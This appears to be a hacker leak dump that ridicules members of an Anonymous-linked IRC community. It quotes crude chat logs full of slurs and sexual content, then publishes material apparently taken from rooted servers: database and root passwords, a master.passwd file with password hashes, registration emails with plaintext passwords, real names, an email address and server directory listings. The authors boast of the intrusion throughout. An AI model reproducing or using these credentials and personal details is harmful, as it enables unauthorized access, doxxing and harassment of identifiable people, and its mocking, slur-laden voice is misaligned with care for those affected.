#711staff: well he will -[nig]Dravas -> #711staff: lol -syense -> #711staff: hell be primary, with necro as second, and me as third -DaftWally -> #711staff: can I be 4th? :3 -[nig]Dravas -> #711staff: can i be 5th :3 -syense -> #711staff: daftwally will probably be 4th - -// And more rank -jewlion -> #711staff: if the site goes down -jewlion -> #711staff: you'll have to be the one to take care of shit -jewlion -> #711staff: Necrobilly and MisterCow are the only one's I'd trust -with the site rite nao :| -jewlion -> #711staff: but MisterCow isn't here - -// They're all about the money, too -UnknownUser -> #711staff: I have a great idea -UnknownUser -> #711staff: we could sell account levels -UnknownUser -> #711staff: like say a platnum acount gets you unlimited access -to all pictures -[nig]ItsNotLupus -> #711staff: syense: wat -UnknownUser -> #711staff: where as a normal account you can only look at 5 pics -in a min - -// Money can buy you status -jewlion -> #711staff: I gave admin to those who donated -jewlion -> #711staff: and have been mods forever - -Dart27 -> #711staff: I was an accident. My mom said, "the ONE time me and your -father had sex I got pregnant" - -Dart27 -> #711staff: Anyways, I've only made one thing in PHP. -Dart27 -> #711staff: But it is cool. - -Tycho -> #711staff: why are you so hard over her anony -anony -> #711staff: because i want my cock in her ass this summer -Tycho -> #711staff: be sure to get vids -anony -> #711staff: lewl -NotDaftWally -> #711staff: yeah -anony -> #711staff: i copy+pasted that to her :3 -anony -> #711staff: on msn -Tycho -> #711staff: i fucking hate you anony -anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you - (7802934048) says: -anony -> #711staff: LOLOLOLOLOLOLOLOLOL -anony -> #711staff: Phill says: -anony -> #711staff: we're so having buttsex. -anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you - (7802934048) says: -anony -> #711staff: No anal. Last time I tried anal I cried. - -lulzwhut -> #711staff: so -lulzwhut -> #711staff: syense is like actually dead -[nig]jewlion -> #711staff: yeah -ECB -> #711staff: wut happened -[nig]jewlion -> #711staff: fluid leak -[nig]jewlion -> #711staff: in his car -[nig]jewlion -> #711staff: dunno wat -ECB -> #711staff: so i get his o:line?!?! -[nig]jewlion -> #711staff: but it caused him to hit a semi - -Tycho -> #711staff: <Necrobilly> I shoulda backed everything up - -Tycho -> #711staff: WHEN YOURE POUNDING A GIRL FROM BEHIND -Tycho -> #711staff: AND HER BACK ARCHES -Tycho -> #711staff: THAT IS FUCKING HOT -Howler -> #711staff: guys can do that too - -// 711staff paypal. Word to the wise: disable it -Dravas -> #711staff: dravas@loliheaven.net - -inky_ -> #711staff: apu and aero are what host 711 - -anony -> #711staff: it felt like i stole keri from you -anony -> #711staff: so I stopped talking to her -andy -> #711staff: uh -andy -> #711staff: lost stole her -andy -> #711staff: from all of you - -/* -* -* There's this "blackops" group that tried to be something, but they just -generate humour -* -*/ - -MDK -> #blackops: yeh we need a pw thats easy to remember -Spaise -> #blackops: umm what about -Spaise -> #blackops: opsareblack - -Spaise -> #blackops: anything else we neeD? -Spaise -> #blackops: ummm -Spaise -> #blackops: flood protection -MDK -> #blackops: how do you change the topic with this script? - -carbonlesz -> #blackops: ... Damnit, MDK. Stop capitalizing random letters of -words in passwords. - -// He means the IRC channel mode -Spaise -> #blackops: hmm cant have private set if its secret -Spaise -> #blackops: grr - -carbonlesz -> #blackops: I should probably use a proxy. - -/* -* -* The guys running the wiki are incompetent -* -*/ - -f0rked -> #wiki: oh, I thought it was ddosed or something -denvetta -> #wiki: picatta's away somewhere -denvetta -> #wiki: Well.. that's possible... but picatta assures me that the -server is ddos proof - -infinity0 -> #wiki: WedTM: NO. nothing was hacked -infinity0 -> #wiki: it was just an exploit in the mediawiki software - -Picatta -> #wiki: OH ASHI- -Picatta -> #wiki: DHIT -Picatta -> #wiki: /var is full - -Apon71 -> #wiki: Big problems with nameserver? -Picatta -> #wiki: yes -Apon71 -> #wiki: Ok, I trust you guys will fix it as always -Apon71 -> #wiki: I've been away for a week, and am trying to catch up on what's -happening -Picatta -> #wiki: I can't really do shit until wedtm gets back - -Apon71 -> #wiki: Either the wiki got hacked -Apon71 -> #wiki: Or one of you is trying to scare away newfags -Ivy -> #wiki: Apon71: yeah it's someone trying to scare away newfags, i'm -guessing Kakama, sigh - -januszeal -> #wiki: why is the wiki down -januszeal -> #wiki: in before, after, and during slowpoke -Picatta -> #wiki: well - -a-n-o-n -> #wiki: wtf... -a-n-o-n -> #wiki: wiki down? -Kakama -> #wiki: ATTENTION SHOPPERS - -infinity0 -> #wiki: Picatta: wiki down again... we should split up the SQL -server vs. the webserver again - -denvetta -> #wiki: wiki down -denvetta -> #wiki: can someone add it to /topi? - -// They actually had the most successful individual security strategy we came -// across - the wiki was down for the majority of the time we had it owned. -// Made it a big pain in the ass and mostly we didn't bother. - - -/* -* -* #anti includes people behind ED. We were hoping oclet would be passing 0day -* around, but the only thing he has or passes is drugs. He's mostly a failure -* at this hacker thing but wins at lulz. -* -*/ - -Talldog -> #anti: Having seen a woman be fucked by a horse, my pants feel -strangely empty -hep -> #anti: i saw women getting fucked by horses when i was still bbsing -oclet -> #anti: ive seen .millions of girls getting fucked by horses just on -accident - -sabotage -> #anti: i miss tacos -sabotage -> #anti: i banged tacos like 10 times too -Shortcat -> #anti: what happen -oclet -> #anti: me2 -sabotage -> #anti: i think she was on top and i started to cum -oclet -> #anti: lets gang bang her -sabotage -> #anti: and i threw her off - -oclet -> #anti: i searched facebook with my last name -oclet -> #anti: theres a lotof bitches i might be related to who are bangin - -hep -> #anti: i am a one dick kind of girl - -hep -> #anti: having a vagina does not entitle you to autorespect - -// Just imagine more of the above, that's 100% of their conversations - - -/* -* -* And basically everyone else in the community is a joker. Here are some random -* quotes -* -*/ - -paraphren -> _Shinigami_: Think she's hot? -http://photos-c.ak.facebook.com/photos-ak-sf2p/v195/7/84/788288923/n788288923_3 -51134_2156.jpg -_Shinigami_ -> paraphren: fuck yes -paraphren -> _Shinigami_: She's 18. Want a chance to fuck her? -_Shinigami_ -> paraphren: yes pls -paraphren -> _Shinigami_: heh -_Shinigami_ -> paraphren: lol -paraphren -> _Shinigami_: Well, first thing... don't mention any of this to -ANYBODY. -_Shinigami_ -> paraphren: k -paraphren -> _Shinigami_: I will quite literally have to kill you. heh -_Shinigami_ -> paraphren: lol k -paraphren -> _Shinigami_: Secondly... I have to talk her into it. She's coming -to Toronto to fuck me and wants to film it and shit, but I can let you have a -go at her if you want. heh -paraphren -> _Shinigami_: Anyway, she's a dirty girl and I'll probably be in -the room too. So hope you're up for it. :p -_Shinigami_ -> paraphren: lol, sounds fine to me -_Shinigami_ -> paraphren: i can be the videographer if you want -paraphren -> _Shinigami_: Seriously though... very important you tell NOBODY. -haha - -CuNt -> Eric: w/e dude i do have a life other than computers -CuNt -> Eric: and i guarentee its a shit load better than yours -Eric -> CuNt: *rollseyes* -Eric -> CuNt: sureeeee buddy -CuNt -> Eric: sureeee buddy -Eric -> CuNt: I make more in a week then u do in a year -CuNt -> Eric: what do u make then dude -Eric -> CuNt: I bang more chicks in a month that u ever will - -d0ct0r -> Eric: how did you join a haxs' group. -Eric -> d0ct0r: obviously I knew me shit -Eric -> d0ct0r: perl, vb, c, the basics - -Agent_Riding -> #Philadelphia: so gnome is like the explorer.exe of ubuntu - -TurbUlated -> anon080: <- sortofwant -anon080 -> TurbUlated: oh. -anon080 -> TurbUlated: your secret is safe - -mattheas -> #fallout: How do I add people -mattheas -> #fallout: what's the command -anon64 -> #fallout: /invite - -srgrnr -> #fallout: i want to go back to high school -srgrnr -> #fallout: where i had friends. -anon64 -> #fallout: high school was gay -srgrnr -> #fallout: i had friends, dude. - -srgrnr -> #fallout: HOW THE FUCK -srgrnr -> #fallout: DO I UNIGNORE SOMEONE -srgrnr -> #fallout: ON IRC - -Phist -> #illmob: Spyd3r: jewlion is one of the top submitters on darknet -Phist -> #illmob: 16 year old anon- turned compsec ethic expert - -Eugene -> HetGezicht: I don't have skills for ddos - -skinless -> Consumerwhore: feel like giving me a short explanation of how to -get into a site? -skinless -> Consumerwhore: i have php python and perl - -kayla -> codenaur: -http://www.google.co.uk/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla -%3Aen-GB%3Aofficial&hs=BBT&q=warning%3A+incompatible+implicit+declaration+of+bu -ilt-in+function+memcpy&btnG=Search&meta= -kayla -> codenaur: memcpy is a function -codenaur -> kayla: ah -codenaur -> kayla: :D -codenaur -> kayla: Thanks <3 - -// Shit this isn't very anonymous -barbanon -> #socal: Gregg Hagglund up in Canada has been tagged as the leader -there - -QED|Pi -> Machine-Gunner: I'll just say they're for Stephen.A -Machine-Gunner -> QED|Pi: oh fuck -Machine-Gunner -> QED|Pi: :P -QED|Pi -> Machine-Gunner: Nice.. -Machine-Gunner -> QED|Pi: Fuuuuuck -Machine-Gunner -> QED|Pi: How did you know -QED|Pi -> Machine-Gunner: it's your ident -QED|Pi -> Machine-Gunner: Stephen.A.@desu-C67BC7B.carleton.ca - -// We owned this. It's between "Not worth mentioning" and "Not worth its own -// section", so we drop it here -define(SQLHOST, 'lulzhost.net'); //MySQL server address, usually -localhost -define(SQLUSER, 'img'); //MySQL user (must be changed) -define(SQLPASS, '3ecaa923-4c0e-4526-9f44-c8a437d88bb5'); //MySQL -user's password (must be changed) -define(SQLDB, 'img'); //Database used by image board -define(ADMIN_PASS, 'fgt'); //Janitor password (CHANGE THIS YO) - -// BANG ON - Give this guy a medal and put him in charge (except he's not dumb -// enough to accept responsibility for this crap shoot) -Orakio -> #programming: Anonymous = mostly idiots. -Orakio -> #programming: Don't work directly with them. -Orakio -> #programming: It's better to linger on the edges, find a good -subgroup. -Orakio -> #programming: I mean I hate scientology and I don't need to be in -some group called anonymous to express that hate. -Orakio -> #programming: Especially when they can't even renew their domain -names. -Orakio -> #programming: It's a liability to be too closely intergrated. -// He has a 30-character nickserv password. No joke. - -GaiaKB -> #privateprivategaia: ServicesUp|Sun Mar 30 04:05:51 EDT 2008|~! Do -NOT talk about #privateprivategaia -GaiaKB -> #privateprivategaia: Something|Sun Mar 30 04:09:59 EDT 2008|~! -Everything discussed here, stays here - -// ZF0 has magic powers that can read your conversations even (yes, even!!) if -// you're using SSL! -ian -> #spk: i pasted that in spk -ian -> #spk: he cant know that -ian -> #spk: i use ssl - -/* -* -* Picatta's spools took up a lot of space, so here's just some mails clean and -* clear -* -*/ - -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ -Dear Hitlerlol, - -Thank you for registering at the Megadeth Forums. Before we can activate your -account one last step must be taken to complete your registration. - -Please note - you must complete this last step to become a registered member. -You will only need to visit this url once to activate your account. - -To complete your registration, please visit this url: -http://forums.megadeth.com/register.php?a=act&u=69022&i=27200622 - -<a -href="http://forums.megadeth.com/register.php?a=act&u=69022&i=27200622" ->America Online Users Please Visit Here to be Activated</a> - -**** Does The Above URL Not Work? **** -If the above url does not work, please use your Web browser to go to: -http://forums.megadeth.com/register.php?a=ver - -Please be sure not to add extra spaces. You will need to type in your username -and activation number on the page that appears when you visit the url. - -Your Username is: Hitlerlol -Your Activation ID is: 27200622 - -If you are still having problems signing up please contact a member of our -support staff at webmaster@megadeth.com - -All the best, -Megadeth Forums -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ - - -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ -Hi, - -You have requested to register the following nickname Picatta. - -Please type " /msg NickServ confirm u95oIIpO3 " to complete registration. - -If you don't know why this mail was sent to you, please ignore it silently. - -PLEASE DON'T ANSWER TO THIS MAIL! - -Rizon administrators. -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ - - -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ -Dear Picatta, - -Thank you for registering at Bodybuilding.com. Before we can activate -your account one last step must be taken to complete your -registration. - -Please note - you must complete this last step to become a registered -member. You will only need to visit this url once to activate your -account. - -To complete your registration, please visit this url: -http://my.bodybuilding.com/register.php?a=3Dact&u=3D13453212&i=3D725985 -83 - -<a -href="http://partyvan.info/serialized/3D%22http://my.bodybuilding.com/register. -php?a=3Dact&u=3D13453212&i=3D=" 72598583="">America -Online Users Please Visit Here to be Activated</a> - -**** Does The Above URL Not Work? **** -If the above url does not work, please use your Web browser to go to: -http://my.bodybuilding.com/register.php?a=3Dver - -Please be sure to type it exactly as it appears. You will need to type -in your Username and Activation ID on the page that appears when you -visit the url. - -Your Username is: Picatta -Your Activation ID is: 72598583 - -If you are still having problems signing up please contact a member of -our support staff at support@bodybuilding.com. - -All the best, -Bodybuilding.com -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ - - -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ -Welcome to forum.i2p Forums - -Please keep this email for your records. Your account information is as -follows: - ----------------------------- -Username: Picatta -Password: lolcats8295 ----------------------------- - -Please do not forget your password as it has been encrypted in our database and -we cannot retrieve it for you. However, should you forget your password you can -request a new one which will be activated in the same way as this account. - -Thank you for registering. -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ - - -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ -Welcome to Operation Clambake Message Board Forums - -Please keep this email for your records. Your account information is as -follows: - ----------------------------- -Username: Picatta -Password: loldongs ----------------------------- - -Your account is currently inactive, the administrator of the board will need to -activate it before you can log in. You will receive another email when this has -occured. - -Please do not forget your password as it has been encrypted in our database and -we cannot retrieve it for you. However, should you forget your password you can -request a new one which will be activated in the same way as this account. - -Thank you for registering. -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ - - -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ -Welcome to Enturbulation.org Forums - -Please keep this email for your records. Your account information is as f= -ollows: - ----------------------------- -Username: Picatta -Password: 86500144 ----------------------------- - -Your account is currently inactive. You cannot use it until you visit the= - following link: -/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ - - -/* -* -* Now let's get to the box pwning. This is inky's server that hosts a handful -of their shitty sites -* -*/ - -drwxr-xr-x 4 root wheel 512 Feb 14 03:05 bbs.711chan.org -drwxr-xr-x 4 root wheel 512 Feb 6 07:03 invalid.site -drwxr-xr-x 4 httpd httpd 512 Jan 26 09:24 lt3c.info -drwxr-xr-x 4 root wheel 512 Feb 1 15:41 maps.lt3c.info -drwxr-xr-x 4 root wheel 512 Feb 19 01:42 no-tolerance.info -drwxr-xr-x 4 root wheel 512 Feb 7 06:53 partyvanradio.org -drwxr-xr-x 4 root wheel 512 Mar 7 15:13 untitledhosting.org -drwxr-xr-x 4 root wheel 512 Feb 19 19:15 virtual.psychomatic.us -drwxr-xr-x 4 root wheel 512 Mar 11 04:13 vzpp.untitledhosting.org -lrwxr-xr-x 1 root wheel 10 Jan 26 09:24 www.lt3c.info -> lt3c.info/ -lrwxr-xr-x 1 root wheel 18 Feb 19 01:43 www.no-tolerance.info -> -no-tolerance.info/ -lrwxr-xr-x 1 root wheel 18 Feb 7 06:53 www.partyvanradio.org -> -partyvanradio.org/ -lrwxr-xr-x 1 root wheel 20 Mar 7 15:13 www.untitledhosting.org -> -untitledhosting.org/ - -$config['db_username'] = 'untitledhosting'; -$config['db_password'] = '0DTtITKJ.yBD'; - -$dbhost = 'localhost'; -$dbport = '3306'; -$dbname = 'lt3c_phpbb'; -$dbuser = 'root'; -$dbpasswd = 'jblink'; - -// ^ that's the root pw too! And his nickserv pass! We rooted the box too fast -// to even have to look up his nickserv pass - -$db_server = 'localhost'; -$db_name = 'nt-server'; -$db_user = 'nt-server'; -$db_passwd = 'nm2KHZaWzwZbWrxT'; -$db_prefix = 'smf_'; - -$config['dbms'] = 'mysql'; -$config['db_hostname'] = 'localhost'; -$config['db_username'] = 'untitledhosting'; -$config['db_password'] = '0DTtITKJ.yBD'; -$config['db_name'] = 'untitledhosting'; - -d><title>hacked by [seven11]</title></head><body bgcolor="black"> -<div align="center" style="color:#FFFFFF"><h1>Hacked by <font -color="red">[seven11]inky</font>, [PURGE] are a load of faggots</h1><br></div> -</body></html> - -// ^ haha - -# shoutcast -Password=imadj -AdminPassword=partyvanorg - - -# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ -# -root:$1$40oTVDjS$IXT5EmlwEhu84acMjAZ/J/:0:0::0:0:Root User:/root:/usr/bin/bash -toor:*:0:0::0:0:Bourne-again Superuser:/root: -daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin -operator:*:2:5::0:0:System &:/:/usr/sbin/nologin -bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin -tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin -kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin -games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin -news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin -man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin -sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin -smmsp:*:25:25::0:0:Sendmail Submission -User:/var/spool/clientmqueue:/usr/sbin/nologin -mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin -bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin -proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin -_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin -_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin -uucp:*:66:66::0:0:UUCP -pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico -pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin -www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin -nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin -ltsvadmin:$1$2fVGuwaC$7B57fBkwiTg9W1S5VKD5u1:1001:1001::0:0:User -&:/home/ltsvadmin:/bin/sh -zipservers:$1$A.lwsVBx$CmzJM6Wt3RX6jOvByFKSv0:1002:0::0:0:User -&:/home/zipservers:/bin/sh -inaki:*:1003:1003::0:0:Inaki:/home/inaki:/usr/local/bin/bash -tremulous:*:1006:1006::0:0:User &:/home/tremulous:/usr/local/bin/bash -trem-maps:*:1008:1008::0:0:User &:/home/trem-maps:/bin/sh -ms-clanserver:$1$KkKxsoei$936d9IWKWrptqxTRqCcKw.:1009:1009::0:0:User -&:/home/ms-clanserver:/usr/local/bin/bash -mysql::88:88::0:0:MySQL Daemon:/nonexistent:/usr/local/bin/bash -httpd::1015:1015::0:0:User &:/home/httpd:/usr/local/bin/bash -mjestic::1017:1017::0:0:User &:/home/mjestic:/bin/sh -alma-server::1018:1018::0:0:alma-server:/home/alma-server:/usr/local/bin/bash -test-serv::1019:1019::0:0:test-serv:/home/test-serv:/usr/local/bin/bash -negroe:$1$GJKcFbkI$eMgx8tGbbuAsIY7z4jrqT/:1020:1020::0:0:User -&:/home/negroe:/usr/local/bin/bash -helldive::1021:1021::0:0:helldive:/home/helldive:/usr/local/bin/bash -relentless:$1$hzrBuTFU$LxjyfrPLRNO5orBe/pw8V.:1022:1022::0:0:User -&:/home/relentless:/usr/local/bin/bash -nt-server:$1$bAEJNi4W$JCRyivGro8EsX/yMCouDS/:1023:1023::0:0:User -&:/home/nt-server:/usr/local/bin/bash -syense:$1$tHx1g5xm$HDClXkM2jE1bosbJDjG.V/:1024:1024::0:0:User -&:/home/syense:/usr/local/bin/bash -trem12:$1$x1CIdzvF$LSaYQRI5aZU0gPSTfOggw0:1025:1025::0:0:User -&:/home/trem12:/usr/local/bin/bash -ian:$1$KW5wFPNM$J1xzBja4bP/6qAtHHBKm//:1026:1026::0:0:User -&:/home/ian:/usr/local/bin/bash -kate:$1$.pMZPvPH$KKvicI7gzVfOMRWmtVfck0:1027:1027::0:0:Kate -Stone:/home/kate:/usr/local/bin/bash -untitledhosting:$1$R8QaOXJ.$zjw6dJXsIiVJlsWfYYKWk.:1028:1028::0:0:User -&:/home/untitledhosting:/usr/local/bin/bash -inkyslair:$1$UFYE2CK0$WrlYr6wPe32qU1j.xwLiz0:1029:1029::0:0:User -&:/home/inkyslair:/usr/local/bin/bash - ->> ls -la /root -total 38474 -drwx------ 19 root wheel 2048 Mar 12 21:59 . -drwxr-xr-x 18 root wheel 512 Jan 26 19:57 .. --rwx------ 1 root wheel 3015 Feb 18 01:18 .bash_h1story --rwx------ 1 root wheel 9711 Mar 22 21:17 .bash_history --rwx------ 1 root wheel 30 Dec 15 17:10 .bash_profile --rwx------ 1 root wheel 30 Dec 15 17:03 .bashrc -drwx------ 4 root wheel 512 Jan 5 10:07 .cpan --rwx------ 2 root wheel 801 Jan 12 2007 .cshrc -drwx------ 2 root wheel 512 Mar 11 01:01 .elinks --rwx------ 1 root wheel 892 Dec 16 11:47 .history -drwx------ 2 root wheel 512 Dec 15 16:14 .irssi --rwx------ 1 root wheel 143 Jan 12 2007 .k5login --rw------- 1 root wheel 35 Mar 12 22:10 .lesshst -drwx------ 2 root wheel 512 Mar 11 01:01 .links --rwx------ 1 root wheel 293 Jan 12 2007 .login --rwx------ 1 root wheel 1081 Feb 25 06:52 .mysql_history --rwx------ 1 root wheel 17401 Mar 12 21:59 .pinerc --rwx------ 2 root wheel 251 Jan 27 21:36 .profile --rw------- 1 root wheel 1024 Feb 25 06:33 .rnd -drwx------ 2 root wheel 512 Jan 29 22:58 .ssh -drwx------ 3 root wheel 512 Jan 4 07:59 .subversion --rwx------ 1 root wheel 0 Feb 18 01:18 .temp -drwx------ 3 root wheel 512 Dec 16 02:48 .tremulous -drwx------ 5 root wheel 512 Dec 18 22:15 .weechat -drwx------ 2 root wheel 512 Dec 29 08:57 72.20.14.247 --rwx------ 1 root wheel 1764184 Dec 19 01:55 Railroad.zip --rwx------ 1 root wheel 205609 Dec 17 15:39 acidtechpurple.zip --rwx------ 1 root wheel 6 Feb 16 19:36 auth.log --rwx------ 1 root wheel 588 Dec 16 02:41 base-config.cfg --rwx------ 1 root wheel 223 Dec 16 02:40 base-confs.cfg --rwx------ 1 root wheel 4199 Feb 18 01:16 bd.pl --rwx------ 1 root wheel 0 Feb 17 14:55 bot.pl -drwx------ 3 root wheel 512 Feb 4 03:08 brute --rwx------ 1 root wheel 65 Feb 19 02:15 db.opt --rwx------ 1 root wheel 1827 Dec 16 03:05 install-trem-server.pl -drwx------ 2 root wheel 6144 Feb 19 02:15 lt3c_phpbb -drwx------ 2 root wheel 512 Jan 23 15:01 mail -drwx------ 5 root wheel 512 Dec 24 01:18 master --rwx------ 1 root wheel 45778 Dec 24 02:56 master.tgz --rwx------ 1 root wheel 4367618 Jan 27 09:16 mbox -drwx------ 14 root wheel 512 Jan 6 07:20 mumble --rwx------ 1 root wheel 631037 Feb 5 00:52 myspace.jpg --rwx------ 1 root wheel 46 Feb 19 02:13 mysql_fix.txt --rwx------ 1 root wheel 10704 Dec 16 21:05 nmap.log --rwx------ 1 root wheel 0 Jan 27 00:09 sshd_log --rwx------ 1 root wheel 92 Dec 16 03:04 start.sh --rwx------ 1 root wheel 29529 Dec 23 21:59 sys.pl --rwx------ 1 root wheel 30932992 Feb 3 08:57 test100.zip -drwx------ 7 root wheel 512 Feb 24 00:05 trunk --rwx------ 1 root wheel 1155345 Feb 18 02:08 -ts2_server_rc2_202319.tar.bz2 -drwx------ 7 zipservers 100 512 Feb 18 22:15 tss2_rc2 -drwx------ 4 root wheel 512 Dec 15 17:53 utils ->> ls -la /usr/home -total 56 -drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 . -drwxr-xr-x 20 root wheel 512 Mar 11 23:49 .. -drwxr-xr-x 6 alma-server alma-server 512 Jan 21 07:40 alma-server -drwxr-xr-x 3 1013 1013 512 Jan 27 09:22 aox -drwxr-xr-x 4 helldive helldive 512 Feb 4 00:21 helldive -drwxr-xr-x 2 httpd httpd 512 Jan 4 05:14 httpd -drwxr-xr-x 5 ian ian 512 Mar 20 17:47 ian -drwx------ 25 inaki inaki 1536 Mar 17 21:06 inaki -drwxr-xr-x 2 inkyslair inkyslair 512 Mar 15 22:16 inkyslair -drwxr-xr-x 3 1010 ircd 512 Dec 16 20:25 ircd -drwxr-xr-x 4 kate kate 512 Feb 28 06:22 kate -drwxr-xr-x 2 1013 1013 512 Dec 14 17:42 ltsvadmin -drwxr-xr-x 5 mjestic mjestic 512 Jan 14 06:44 mjestic -drwxr-xr-x 4 ms-clanserver ms-clanserver 512 Dec 17 04:12 -ms-clanserver -drwxr-xr-x 4 negroe negroe 512 Feb 9 10:21 negroe -drwxr-xr-x 9 nt-server nt-server 512 Mar 9 01:36 nt-server -drwxr-xr-x 3 1013 1013 512 Dec 16 02:28 powerover -drwxr-xr-x 2 relentless relentless 512 Feb 7 16:55 relentless -drwxr-xr-x 6 syense syense 512 Mar 17 07:51 syense -drwxr-xr-x 4 test-serv test-serv 512 Jan 21 08:01 test-serv -drwxr-xr-x 5 trem-maps trem-maps 6656 Feb 26 03:57 trem-maps -drwxr-xr-x 4 trem12 trem12 512 Feb 18 22:53 trem12 -drwxr-xr-x 5 tremulous tremulous 512 Mar 21 20:09 tremulous -drwxr-xr-x 2 untitledhosting untitledhosting 512 Mar 7 15:18 -untitledhosting -drwxr-xr-x 2 1013 1013 512 Feb 23 07:23 zipservers ->> ls -la invalid.site/www/ -total 3718 -drwxrwxrwx 3 root wheel 512 Mar 11 04:15 . -drwxr-xr-x 4 root wheel 512 Feb 6 07:03 .. --rwxr-xr-x 1 root wheel 551940 Mar 1 04:58 __spl -drwxr-xr-x 11 root wheel 2560 Mar 10 03:49 __sql --rwxr-xr-x 1 root wheel 13534 Mar 5 06:47 a.out --rw-r--r-- 1 root wheel 2412 Feb 15 07:40 attack.php --rw-r--r-- 1 root wheel 2412 Feb 15 07:40 attack.src --rwxr-xr-x 1 root wheel 4175 Mar 8 02:18 bd.txt --rwxr-xr-x 1 root wheel 4168 Mar 8 02:24 bd_2.txt --rwxrwxrwx 1 root wheel 4606 Feb 29 06:10 bopm.conf --rw-r--r-- 1 root wheel 5784 Mar 3 13:54 cute.php --rw-r--r-- 1 root wheel 706 Mar 9 06:23 dc.txt --rw-r--r-- 1 root wheel 5185 Mar 1 05:55 exp.pm --rw-r--r-- 1 root wheel 10486 Mar 1 06:10 get.txt --rw-r--r-- 1 root wheel 10423 Mar 1 06:00 get.txty --rw-r--r-- 1 root wheel 20 Mar 1 03:18 index.php --rw-r--r-- 1 root wheel 341 Mar 7 02:22 inf.txt --rwxr-xr-x 1 root wheel 13534 Mar 1 06:54 kmod --rw-r--r-- 1 root wheel 3740 Mar 15 13:56 kmod.c --rwxr-xr-x 1 root wheel 9014 Mar 5 06:47 krad --rw-r--r-- 1 root wheel 232 Feb 14 03:11 owned.php --rwxr-xr-x 1 root wheel 8574 Mar 1 06:17 perl_root --rw------- 1 httpd wheel 3072000 Mar 9 05:21 php-cgi.core --rw-r--r-- 1 root wheel 3457 Feb 29 06:33 repl.txt -[root@athena:/var/www] - ->> ls -la lt3c.info/www/ -total 712 -drwxr-xr-x 7 httpd httpd 512 Feb 16 19:37 . -drwxr-xr-x 4 httpd httpd 512 Jan 26 09:24 .. --rw-r--r-- 1 root httpd 205609 Dec 17 15:39 acidtechpurple.zip -drwxr-xr-x 2 httpd httpd 512 Jan 31 02:23 css -drwxr-xr-x 13 httpd httpd 1024 Feb 9 02:40 forum -drwxr-xr-x 2 httpd httpd 512 Jan 31 05:34 images --rw-r--r-- 1 httpd httpd 3094 Mar 8 01:44 index.php -drwxr-xr-x 2 httpd httpd 512 Mar 17 20:50 inky --rw-r--r-- 1 httpd httpd 267 Mar 8 01:44 lib.php -drwxr-xr-x 2 httpd httpd 512 Jan 31 07:01 pages --rw-r--r-- 1 httpd httpd 904 Mar 8 01:44 temp.htm --rw-r--r-- 1 root httpd 45 Feb 12 08:27 uta.htm --rw-r--r-- 1 root httpd 214602 Feb 12 08:13 uta.pmd --rw-r--r-- 1 root httpd 211734 Feb 12 08:24 uta.qcp -[root@athena:/var/www] ->> ls -la partyvanradio.org/www/ -total 6 -drwxr-xr-x 2 relentless relentless 512 Feb 7 06:54 . -drwxr-xr-x 4 root wheel 512 Feb 7 06:53 .. --rw-r--r-- 1 relentless relentless 166 Feb 7 07:13 index.php -[root@athena:/var/www] ->> ls -la untitledhosting.org/www/ -total 74 -drwxr-xr-x 10 untitledhosting untitledhosting 512 Mar 10 03:05 . -drwxr-xr-x 4 root wheel 512 Mar 7 15:13 .. --rw-r--r-- 1 untitledhosting untitledhosting 8 Mar 10 03:05 LAWL -drwxr-xr-x 4 untitledhosting untitledhosting 2048 Mar 10 02:47 admin --rwxr-xr-x 1 untitledhosting untitledhosting 5805 Mar 10 02:52 config.php -drwxr-xr-x 2 untitledhosting untitledhosting 512 Mar 10 02:47 doc --rw-r--r-- 1 untitledhosting untitledhosting 318 Jan 3 02:56 -favicon_cms.ico --rw-r--r-- 1 untitledhosting untitledhosting 330 Jan 3 02:56 fileloc.php -drwxr-xr-x 3 untitledhosting untitledhosting 512 Mar 10 02:47 images --rw-r--r-- 1 untitledhosting untitledhosting 8187 Jan 3 02:56 include.php --rw-r--r-- 1 untitledhosting untitledhosting 9809 Jan 3 02:56 index.php -drwxr-xr-x 11 untitledhosting untitledhosting 512 Mar 10 02:47 lib --rw-r--r-- 1 untitledhosting untitledhosting 961 Jan 3 02:56 moduleinterface.php -drwxrwxrwx 12 untitledhosting untitledhosting 512 Mar 10 02:47 modules -drwxr-xr-x 3 untitledhosting untitledhosting 2048 Mar 10 02:47 plugins --rw-r--r-- 1 untitledhosting untitledhosting 1955 Jan 3 02:56 preview.php --rw-r--r-- 